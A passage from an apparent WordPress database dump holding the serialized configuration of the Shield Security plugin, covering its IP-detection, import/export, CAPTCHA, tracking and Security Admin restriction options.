IP\";}i:1;a:2:{s:9:\"value_key\";s:11:\"REMOTE_ADDR\";s:4:\"text\";s:11:\"REMOTE_ADDR\";}i:2;a:2:{s:9:\"value_key\";s:21:\"HTTP_CF_CONNECTING_IP\";s:4:\"text\";s:21:\"HTTP_CF_CONNECTING_IP\";}i:3;a:2:{s:9:\"value_key\";s:20:\"HTTP_X_FORWARDED_FOR\";s:4:\"text\";s:20:\"HTTP_X_FORWARDED_FOR\";}i:4;a:2:{s:9:\"value_key\";s:16:\"HTTP_X_FORWARDED\";s:4:\"text\";s:16:\"HTTP_X_FORWARDED\";}i:5;a:2:{s:9:\"value_key\";s:14:\"HTTP_X_REAL_IP\";s:4:\"text\";s:14:\"HTTP_X_REAL_IP\";}i:6;a:2:{s:9:\"value_key\";s:22:\"HTTP_X_SUCURI_CLIENTIP\";s:4:\"text\";s:22:\"HTTP_X_SUCURI_CLIENTIP\";}i:7;a:2:{s:9:\"value_key\";s:20:\"HTTP_INCAP_CLIENT_IP\";s:4:\"text\";s:20:\"HTTP_INCAP_CLIENT_IP\";}i:8;a:2:{s:9:\"value_key\";s:22:\"HTTP_X_SP_FORWARDED_IP\";s:4:\"text\";s:22:\"HTTP_X_SP_FORWARDED_IP\";}i:9;a:2:{s:9:\"value_key\";s:14:\"HTTP_FORWARDED\";s:4:\"text\";s:14:\"HTTP_FORWARDED\";}i:10;a:2:{s:9:\"value_key\";s:14:\"HTTP_CLIENT_IP\";s:4:\"text\";s:14:\"HTTP_CLIENT_IP\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dn\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"Visitor IP Address\";s:7:\"summary\";s:22:\"Which Address Is Yours\";s:11:\"description\";s:85:\"There are many way to detect visitor IP addresses. Please select yours from the list.\";}i:4;a:10:{s:3:\"key\";s:24:\"block_send_email_address\";s:7:\"section\";s:16:\"section_defaults\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Report Email\";s:7:\"summary\";s:27:\"Where to send email reports\";s:11:\"description\";s:66:\"If this is empty, it will default to the blog admin email address.\";}i:5;a:9:{s:3:\"key\";s:27:\"enable_upgrade_admin_notice\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"In-Plugin Notices\";s:7:\"summary\";s:31:\"Display Plugin Specific Notices\";s:11:\"description\";s:105:\"Disable this option to hide certain plugin admin notices about available updates and post-update notices.\";}i:6;a:9:{s:3:\"key\";s:20:\"display_plugin_badge\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/5v\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf20\";s:4:\"name\";s:17:\"Show Plugin Badge\";s:7:\"summary\";s:33:\"Display Plugin Badge On Your Site\";s:11:\"description\";s:187:\"Enabling this option helps support the plugin by spreading the word about it on your website. The plugin badge also demonstrates to visitors that you take your website security seriously.\";}i:7;a:11:{s:3:\"key\";s:12:\"enable_wpcli\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/i1\";s:9:\"link_blog\";s:19:\"https://shsec.io/i2\";s:4:\"name\";s:12:\"Allow WP-CLI\";s:7:\"summary\";s:50:\"Allow Access And Control Of This Plugin Via WP-CLI\";s:11:\"description\";s:65:\"Turn off this option to disable this plugin\'s WP-CLI integration.\";}i:8;a:9:{s:3:\"key\";s:27:\"enable_xmlrpc_compatibility\";s:7:\"section\";s:16:\"section_defaults\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"XML-RPC Compatibility\";s:7:\"summary\";s:56:\"Allow Login Through XML-RPC To By-Pass Login Guard Rules\";s:11:\"description\";s:95:\"Enable this if you need XML-RPC functionality e.g. if you use the WordPress iPhone/Android App.\";}i:9;a:11:{s:3:\"key\";s:19:\"importexport_enable\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/do\";s:9:\"link_blog\";s:19:\"https://shsec.io/dp\";s:4:\"name\";s:19:\"Allow Import/Export\";s:7:\"summary\";s:65:\"Allow Import Of Options To, And Export Of Options From, This Site\";s:11:\"description\";s:68:\"Uncheck this box to completely disable import and export of options.\";}i:10;a:10:{s:3:\"key\";s:22:\"importexport_masterurl\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Auto-Import URL\";s:7:\"summary\";s:43:\"Automatically Import Options From This Site\";s:11:\"description\";s:115:\"Supplying a valid site URL here will make this site an \'Options Slave\' and will automatically import options daily.\";}i:11;a:12:{s:3:\"key\";s:22:\"importexport_whitelist\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Export Whitelist\";s:7:\"summary\";s:68:\"Whitelisted Sites Which Do Not Need The Secret Key To Export Options\";s:11:\"description\";s:132:\"Each site on this list will be able to export options from this site without providing the secret key. Take a new line for each URL.\";}i:12;a:11:{s:3:\"key\";s:29:\"importexport_whitelist_notify\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:9:\"sensitive\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Notify Whitelist\";s:7:\"summary\";s:59:\"Notify Sites On The Whitelist To Update Options From Master\";s:11:\"description\";s:110:\"When enabled, manual options saving will notify sites on the whitelist to export options from the Master site.\";}i:13;a:12:{s:3:\"key\";s:22:\"importexport_secretkey\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:16:\"noneditable_text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"Secret Key\";s:7:\"summary\";s:24:\"Import/Export Secret Key\";s:11:\"description\";s:79:\"Keep this Secret Key private as it will allow the import and export of options.\";}i:14;a:9:{s:3:\"key\";s:20:\"delete_on_deactivate\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Delete Plugin Settings\";s:7:\"summary\";s:51:\"Delete All Plugin Settings Upon Plugin Deactivation\";s:11:\"description\";s:67:\"Careful: Removes all plugin options when you deactivate the plugin.\";}i:15;a:10:{s:3:\"key\";s:15:\"locale_override\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/il\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Locale Override\";s:7:\"summary\";s:51:\"Delete All Plugin Settings Upon Plugin Deactivation\";s:11:\"description\";s:67:\"Careful: Removes all plugin options when you deactivate the plugin.\";}i:16;a:10:{s:3:\"key\";s:16:\"captcha_provider\";s:7:\"section\";s:27:\"section_third_party_captcha\";s:7:\"default\";s:10:\"grecaptcha\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:2:{i:0;a:2:{s:9:\"value_key\";s:10:\"grecaptcha\";s:4:\"text\";s:19:\"Google reCAPTCHA v2\";}i:1;a:2:{s:9:\"value_key\";s:8:\"hcaptcha\";s:4:\"text\";s:8:\"hCaptcha\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dq\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"CAPTCHA Provider\";s:7:\"summary\";s:40:\"Which CAPTCHA Provider To Use Throughout\";s:11:\"description\";s:66:\"You can choose the CAPTCHA provider depending on your preferences.\";}i:17;a:11:{s:3:\"key\";s:22:\"google_recaptcha_style\";s:7:\"section\";s:27:\"section_third_party_captcha\";s:7:\"premium\";b:1;s:7:\"default\";s:5:\"light\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:1;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:2;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dq\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"CAPTCHA Type\";s:7:\"summary\";s:49:\"How Google reCAPTCHA Will Be Displayed By Default\";s:11:\"description\";s:109:\"You can choose the reCAPTCHA display format that best suits your site, including the new Invisible Recaptcha.\";}i:18;a:10:{s:3:\"key\";s:25:\"google_recaptcha_site_key\";s:7:\"section\";s:27:\"section_third_party_captcha\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:22:\"https://shsec.io/shld5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"reCAPTCHA Site Key\";s:7:\"summary\";s:67:\"Google reCAPTCHA Site Key - Only v2 or Invisible. v3 NOT supported.\";s:11:\"description\";s:67:\"Enter your Google reCAPTCHA site key for use throughout the plugin.\";}i:19;a:10:{s:3:\"key\";s:27:\"google_recaptcha_secret_key\";s:7:\"section\";s:27:\"section_third_party_captcha\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:22:\"https://shsec.io/shld5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"reCAPTCHA Secret\";s:7:\"summary\";s:69:\"Google reCAPTCHA Secret Key - Only v2 or Invisible. v3 NOT supported.\";s:11:\"description\";s:69:\"Enter your Google reCAPTCHA secret key for use throughout the plugin.\";}i:20;a:6:{s:3:\"key\";s:21:\"tracking_last_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;s:3:\"min\";i:0;}i:21;a:5:{s:3:\"key\";s:22:\"unique_installation_id\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";i:0;}i:22;a:4:{s:3:\"key\";s:26:\"tracking_permission_set_at\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:23;a:5:{s:3:\"key\";s:17:\"installation_time\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:24;a:5:{s:3:\"key\";s:12:\"activated_at\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:25;a:5:{s:3:\"key\";s:33:\"importexport_secretkey_expires_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:26;a:5:{s:3:\"key\";s:33:\"importexport_handshake_expires_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:27;a:5:{s:3:\"key\";s:21:\"last_ip_detect_source\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:28;a:6:{s:3:\"key\";s:19:\"openssl_private_key\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:29;a:6:{s:3:\"key\";s:10:\"snapi_data\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:30;a:5:{s:3:\"key\";s:18:\"captcha_checked_at\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:3:\"int\";s:7:\"default\";i:-1;}i:31;a:5:{s:3:\"key\";s:20:\"cache_dir_write_test\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:16:{s:12:\"survey_email\";s:36:\"c3VwcG9ydEBvbmVkb2xsYXJwbHVnaW4uY29t\";s:13:\"help_video_id\";s:0:\"\";s:20:\"tracking_cron_handle\";s:20:\"plugin_tracking_cron\";s:17:\"tracking_post_url\";s:51:\"https://tracking.icontrolwp.com/track/plugin/shield\";s:22:\"importexport_cron_name\";s:10:\"autoimport\";s:19:\"href_privacy_policy\";s:38:\"https://shsec.io/wpshieldprivacypolicy\";s:10:\"db_classes\";a:2:{s:5:\"geoip\";s:64:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\GeoIp\\Handler\";s:5:\"notes\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\AdminNotes\\Handler\";}s:19:\"db_autoexpire_notes\";i:0;s:19:\"db_autoexpire_geoip\";i:30;s:13:\"db_notes_name\";s:5:\"notes\";s:22:\"db_notes_table_columns\";a:2:{s:11:\"wp_username\";s:39:\"varchar(255) NOT NULL DEFAULT \'unknown\'\";s:4:\"note\";s:4:\"TEXT\";}s:16:\"geoip_table_name\";s:5:\"geoip\";s:19:\"geoip_table_columns\";a:2:{s:2:\"ip\";s:47:\"varbinary(16) DEFAULT NULL COMMENT \'IP Address\'\";s:4:\"meta\";s:4:\"TEXT\";}s:22:\"active_plugin_features\";a:20:{i:0;a:3:{s:4:\"slug\";s:8:\"insights\";s:13:\"load_priority\";i:1;s:13:\"menu_priority\";i:5;}i:1;a:3:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:9:\"namespace\";s:13:\"SecurityAdmin\";s:13:\"load_priority\";i:11;}i:2;a:3:{s:4:\"slug\";s:3:\"ips\";s:13:\"load_priority\";i:15;s:9:\"namespace\";s:3:\"IPs\";}i:3;a:3:{s:4:\"slug\";s:11:\"audit_trail\";s:13:\"load_priority\";i:11;s:6:\"hidden\";b:0;}i:4;a:2:{s:4:\"slug\";s:12:\"hack_protect\";s:9:\"namespace\";s:9:\"HackGuard\";}i:5;a:2:{s:4:\"slug\";s:7:\"traffic\";s:13:\"load_priority\";i:12;}i:6;a:2:{s:4:\"slug\";s:8:\"firewall\";s:13:\"load_priority\";i:1000;}i:7;a:3:{s:4:\"slug\";s:13:\"login_protect\";s:11:\"storage_key\";s:12:\"loginprotect\";s:9:\"namespace\";s:10:\"LoginGuard\";}i:8;a:1:{s:4:\"slug\";s:15:\"user_management\";}i:9;a:2:{s:4:\"slug\";s:15:\"comments_filter\";s:11:\"storage_key\";s:14:\"commentsfilter\";}i:10;a:2:{s:4:\"slug\";s:6:\"events\";s:13:\"load_priority\";i:11;}i:11;a:2:{s:4:\"slug\";s:9:\"reporting\";s:13:\"load_priority\";i:12;}i:12;a:2:{s:4:\"slug\";s:8:\"sessions\";s:13:\"load_priority\";i:5;}i:13;a:2:{s:4:\"slug\";s:12:\"integrations\";s:13:\"load_priority\";i:20;}i:14;a:2:{s:4:\"slug\";s:7:\"license\";s:13:\"load_priority\";i:10;}i:15;a:1:{s:4:\"slug\";s:11:\"autoupdates\";}i:16;a:1:{s:4:\"slug\";s:7:\"headers\";}i:17;a:1:{s:4:\"slug\";s:8:\"lockdown\";}i:18;a:1:{s:4:\"slug\";s:5:\"comms\";}i:19;a:1:{s:4:\"slug\";s:5:\"email\";}}s:6:\"events\";a:10:{s:13:\"test_cron_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:18:\"import_notify_sent\";a:1:{s:4:\"stat\";b:0;}s:22:\"import_notify_received\";a:1:{s:4:\"stat\";b:0;}s:16:\"options_exported\";a:2:{s:4:\"stat\";b:1;s:6:\"recent\";b:1;}s:16:\"options_imported\";a:2:{s:4:\"stat\";b:1;s:6:\"recent\";b:1;}s:20:\"whitelist_site_added\";a:1:{s:4:\"stat\";b:0;}s:22:\"whitelist_site_removed\";a:1:{s:4:\"stat\";b:0;}s:14:\"master_url_set\";a:1:{s:4:\"stat\";b:0;}s:17:\"recaptcha_success\";a:1:{s:5:\"audit\";b:0;}s:14:\"recaptcha_fail\";a:1:{s:5:\"audit\";b:1;}}s:7:\"wizards\";a:1:{s:7:\"welcome\";a:4:{s:5:\"title\";s:28:\"Getting Started Setup Wizard\";s:4:\"desc\";s:106:\"An introduction to this security plugin, helping you get setup and started quickly with the core features.\";s:20:\"min_user_permissions\";s:14:\"manage_options\";s:5:\"steps\";a:10:{s:7:\"welcome\";a:2:{s:14:\"security_admin\";b:0;s:5:\"title\";s:7:\"Welcome\";}s:9:\"ip_detect\";a:1:{s:5:\"title\";s:12:\"IP Detection\";}s:24:\"admin_access_restriction\";a:1:{s:5:\"title\";s:14:\"Security Admin\";}s:11:\"audit_trail\";a:1:{s:5:\"title\";s:11:\"Audit Trail\";}s:3:\"ips\";a:1:{s:5:\"title\";s:12:\"IP Blacklist\";}s:13:\"login_protect\";a:1:{s:5:\"title\";s:16:\"Login Protection\";}s:15:\"comments_filter\";a:1:{s:5:\"title\";s:12:\"Comment SPAM\";}s:16:\"how_shield_works\";a:1:{s:5:\"title\";s:16:\"How Shield Works\";}s:5:\"optin\";a:1:{s:5:\"title\";s:8:\"Join Us!\";}s:8:\"thankyou\";a:2:{s:14:\"security_admin\";b:0;s:5:\"title\";s:10:\"Thank You!\";}}}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(420376,'shield_mod_config_6b3304b9891738d259290b0c3150bc82','a:6:{s:4:\"slug\";s:8:\"insights\";s:10:\"properties\";a:16:{s:4:\"slug\";s:8:\"insights\";s:4:\"name\";s:9:\"Dashboard\";s:10:\"menu_title\";s:18:\"Security Dashboard\";s:13:\"menu_priority\";s:1:\"5\";s:21:\"show_module_menu_item\";b:1;s:19:\"show_module_options\";b:0;s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:8:\"insights\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:14:\"skip_processor\";b:1;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:0;}s:8:\"sections\";a:1:{i:0;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:0:{}s:10:\"meta_modts\";i:1611420210;}','yes'),(420377,'shield_mod_config_e0495676067f0167956087cced45d94f','a:8:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:10:\"properties\";a:14:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:4:\"name\";s:14:\"Security Admin\";s:12:\"sidebar_name\";s:14:\"Security Admin\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:24:\"admin_access_restriction\";s:7:\"tagline\";s:58:\"Protect your Security Plugin, not just your WordPress site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:20;}s:5:\"wpcli\";a:1:{s:4:\"root\";s:8:\"secadmin\";}s:13:\"admin_notices\";a:2:{s:26:\"certain-options-restricted\";a:5:{s:2:\"id\";s:26:\"certain-options-restricted\";s:8:\"schedule\";s:10:\"conditions\";s:12:\"plugin_admin\";s:2:\"no\";s:8:\"per_user\";b:1;s:4:\"type\";s:7:\"warning\";}s:22:\"admin-users-restricted\";a:5:{s:2:\"id\";s:22:\"admin-users-restricted\";s:8:\"schedule\";s:10:\"conditions\";s:12:\"plugin_admin\";s:2:\"no\";s:4:\"type\";s:7:\"warning\";s:8:\"per_user\";b:1;}}s:8:\"sections\";a:5:{i:0;a:6:{s:4:\"slug\";s:41:\"section_admin_access_restriction_settings\";s:7:\"primary\";b:1;s:5:\"title\";s:35:\"Security Admin Restriction Settings\";s:11:\"title_short\";s:23:\"Security Admin Settings\";s:7:\"summary\";a:2:{i:0;s:52:\"Purpose - Restrict access using a simple Access PIN.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}s:13:\"help_video_id\";s:9:\"338551188\";}i:1;a:5:{s:4:\"slug\";s:38:\"section_admin_access_restriction_areas\";s:5:\"title\";s:32:\"Security Admin Restriction Zones\";s:11:\"title_short\";s:24:\"Access Restriction Zones\";s:7:\"summary\";a:2:{i:0;s:120:\"Purpose - Restricts access to key WordPress areas for all users not authenticated with the Security Admin Access system.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}s:13:\"help_video_id\";s:9:\"339824074\";}i:2;a:4:{s:4:\"slug\";s:18:\"section_whitelabel\";s:5:\"title\";s:18:\"Shield White Label\";s:11:\"title_short\";s:11:\"White Label\";s:7:\"summary\";a:1:{i:0;s:92:\"Purpose - Rename and re-brand the Shield Security plugin for your client site installations.\";}}i:3;a:4:{s:4:\"slug\";s:54:\"section_enable_plugin_feature_admin_access_restriction\";s:5:\"title\";s:39:\"Enable Module: WordPress Security Admin\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:3:{i:0;s:100:\"Purpose - Restricts access to this plugin preventing unauthorized changes to your security settings.\";i:1;s:59:\"Recommendation - Keep the Security Admin feature turned on.\";i:2;s:63:\"You need to also enter a new Access PIN to enable this feature.\";}}i:4;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:21:{i:0;a:10:{s:3:\"key\";s:31:\"enable_admin_access_restriction\";s:7:\"section\";s:54:\"section_enable_plugin_feature_admin_access_restriction\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/40\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf02\";s:4:\"name\";s:21:\"Enable Security Admin\";s:7:\"summary\";s:41:\"Enforce Security Admin Access Restriction\";s:11:\"description\";s:157:\"Enable this with great care and consideration. When this Access PIN option is enabled, you must specify a key below and use it to gain access to this plugin.\";}i:1;a:10:{s:3:\"key\";s:16:\"admin_access_key\";s:7:\"section\";s:41:\"section_admin_access_restriction_settings\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:9:\"link_info\";s:19:\"https://shsec.io/42\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:25:\"Security Admin Access PIN\";s:7:\"summary\";s:40:\"Provide/Update Security Admin Access PIN\";s:11:\"description\";s:92:\"Careful: If you forget this, you could potentially lock yourself out from using this plugin.\";}i:2;a:12:{s:3:\"key\";s:15:\"sec_admin_users\";s:7:\"section\";s:41:\"section_admin_access_restriction_settings\";s:8:\"advanced\";b:1;s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/dk\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Security Admins\";s:7:\"summary\";s:26:\"Persistent Security Admins\";s:11:\"description\";s:79:\"All emails, usernames, or user IDs entered here will always be Security Admins.\";}i:3;a:11:{s:3:\"key\";s:20:\"admin_access_timeout\";s:7:\"section\";s:41:\"section_admin_access_restriction_settings\";s:8:\"advanced\";b:1;s:7:\"default\";i:30;s:4:\"type\";s:7:\"integer\";s:3:\"min\";i:1;s:9:\"link_info\";s:19:\"https://shsec.io/41\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Security Admin Timeout\";s:7:\"summary\";s:63:\"Specify An Automatic Timeout Interval For Security Admin Access\";s:11:\"description\";s:133:\"This will automatically expire your Security Admin Session. Does not apply until you enter the access PIN again. Default: 60 minutes.\";}i:4;a:10:{s:3:\"key\";s:20:\"allow_email_override\";s:7:\"section\";s:41:\"section_admin_access_restriction_settings\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/gf\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Allow Email Override\";s:7:\"summary\";s:49:\"Allow Email Override Of Admin Access Restrictions\";s:11:\"description\";s:96:\"Allow the use of verification emails to override and switch off the Security Admin restrictions.\";}i:5;a:9:{s:3:\"key\";s:29:\"admin_access_restrict_options\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf32\";s:4:\"name\";s:5:\"Pages\";s:7:\"summary\";s:56:\"Restrict Access To Key WordPress Posts And Pages Actions\";s:11:\"description\";s:140:\"Careful: This will restrict access to page/post creation, editing and deletion. Note: Selecting \'Edit\' will also restrict all other options.\";}i:6;a:10:{s:3:\"key\";s:33:\"admin_access_restrict_admin_users\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"Admin Users\";s:7:\"summary\";s:57:\"Restrict Access To Create/Delete/Modify Other Admin Users\";s:11:\"description\";s:127:\"Careful: This will restrict the ability of WordPress administrators from creating, modifying or promoting other administrators.\";}i:7;a:10:{s:3:\"key\";s:29:\"admin_access_restrict_plugins\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:16:\"activate_plugins\";s:4:\"text\";s:8:\"Activate\";}i:1;a:2:{s:9:\"value_key\";s:15:\"install_plugins\";s:4:\"text\";s:7:\"Install\";}i:2;a:2:{s:9:\"value_key\";s:14:\"update_plugins\";s:4:\"text\";s:6:\"Update\";}i:3;a:2:{s:9:\"value_key\";s:14:\"delete_plugins\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf21\";s:7:\"summary\";s:47:\"Restrict Access To Key WordPress Plugin Actions\";s:11:\"description\";s:156:\"Careful: This will restrict access to plugin installation, update, activation and deletion. Note: Selecting \'Activate\' will also restrict all other options.\";}i:8;a:10:{s:3:\"key\";s:28:\"admin_access_restrict_themes\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:13:\"switch_themes\";s:4:\"text\";s:8:\"Activate\";}i:1;a:2:{s:9:\"value_key\";s:18:\"edit_theme_options\";s:4:\"text\";s:18:\"Edit Theme Options\";}i:2;a:2:{s:9:\"value_key\";s:14:\"install_themes\";s:4:\"text\";s:7:\"Install\";}i:3;a:2:{s:9:\"value_key\";s:13:\"update_themes\";s:4:\"text\";s:6:\"Update\";}i:4;a:2:{s:9:\"value_key\";s:13:\"delete_themes\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf21\";s:7:\"summary\";s:42:\"Restrict Access To WordPress Theme Actions\";s:11:\"description\";s:90:\"Careful: This will restrict access to theme installation, update, activation and 